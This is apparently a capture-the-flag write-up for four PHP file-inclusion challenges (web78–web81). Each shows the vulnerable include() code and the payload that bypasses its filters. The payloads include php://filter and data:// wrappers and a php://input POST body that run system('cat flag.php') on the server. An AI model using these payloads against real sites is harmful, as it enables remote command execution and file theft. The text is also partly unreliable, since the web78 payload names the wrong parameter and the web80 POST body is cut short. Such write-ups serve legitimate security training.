web78
if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); }
使用 include进行了文件包含
payload:?filter=php://filter/convert.base64-encode/resource=flag.php
web79
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); }
替换了 php
payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
(PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= 为 <?php system('cat flag.php');
web80
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); $file = str_replace("data", "???", $file); include($file); }else{ highlight_file(__FILE__); }
替换了 data
payload:?file=Php://
POST:<?php system('cat fl*');?
这里用hackbar无法传入,可以用burpsuite
web81
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); $file = str_replace("data", "???", $file); $file = str_replace(":", "???", $file); include($file); }else{ highlight_file(__FILE__); }
: 被替换